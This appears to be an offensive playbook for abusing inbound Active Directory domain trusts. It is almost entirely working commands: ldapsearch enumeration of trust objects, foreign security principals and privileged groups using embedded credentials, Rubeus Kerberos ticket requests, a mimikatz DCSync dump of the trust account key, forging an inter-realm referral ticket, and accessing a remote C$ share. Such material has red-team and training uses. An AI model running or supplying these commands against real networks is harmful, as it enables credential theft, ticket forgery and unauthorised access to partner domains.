Inbound trust abuse starts when the target domain trusts principals from another domain. We operate from the trusted side, identify which foreign principals have access in the trusting domain, then impersonate or forge the right identity to reach the resource.
Read the target trust object
ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=trustedDomain)' name trustPartner trustDirection trustAttributes flatName
Enumerate foreign security principals in the trusting domain
ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=foreignSecurityPrincipal)' cn memberOf distinguishedName
Ignore default well-known SIDs
S-1-5-4
S-1-5-9
S-1-5-11
S-1-5-17
Resolve interesting foreign SID in the source domain
ldapsearch -LLL -x -H ldap://trusted-dc.trusted.local -D 'TRUSTED\user' -w 'Password123!' -b 'DC=trusted,DC=local' '(objectSid=S-1-5-21-1111111111-2222222222-3333333333-6102)' samAccountName distinguishedName objectClass
Enumerate members of the privileged target-domain group
ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(&(|(samAccountType=805306368)(samAccountType=268435456))(memberOf=CN=Partner Jump Users,CN=Users,DC=partner,DC=com))' distinguishedName sAMAccountName
Enumerate target DCs
nslookup -type=SRV _ldap._tcp.dc._msdcs.partner.com 10.10.10.200
Enumerate GPOs and links
ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=groupPolicyContainer)' displayName gPCFileSysPath
ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(&(|(objectClass=organizationalUnit)(objectClass=domain))(gPLink=*{DFE606B4-CA59-4AD6-9BCE-55AF35888129}*))' objectClass name
Known user ticket path with Rubeus
Rubeus.exe asktgt /user:rsteel /domain:trusted.local /aes256:<USER_AES256> /dc:trusted-dc.trusted.local /nowrap
Rubeus.exe asktgs /service:krbtgt/partner.com /ticket:<TGT_BASE64> /nowrap
Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /targetdomain:partner.com /dc:target-dc.partner.com /ticket:<INTER_REALM_TGT_BASE64> /ptt
dir \\par-jmp-1.partner.com\c$
Forge inter-realm referral ticket with trust key
mimikatz.exe "lsadump::dcsync /domain:trusted.local /user:TRUSTED\PARTNER$" "exit"
Rubeus.exe silver /user:pchilds /domain:trusted.local /sid:<TRUSTED_DOMAIN_SID> /id:1105 /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:<INTER_REALM_RC4> /nowrap
Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /targetdomain:partner.com /dc:target-dc.partner.com /ticket:<INTER_REALM_TGT_BASE64> /ptt
dir \\par-jmp-1.partner.com\c$
Notes
The foreign security principal object lives in the trusting domain, but the SID belongs to the trusted domain. Resolve the SID in the source domain, not in the domain where the FSP object was found.
When forging the inter-realm ticket manually, group membership must match the intended identity. Do not rely on default group values when the target access depends on a specific foreign group.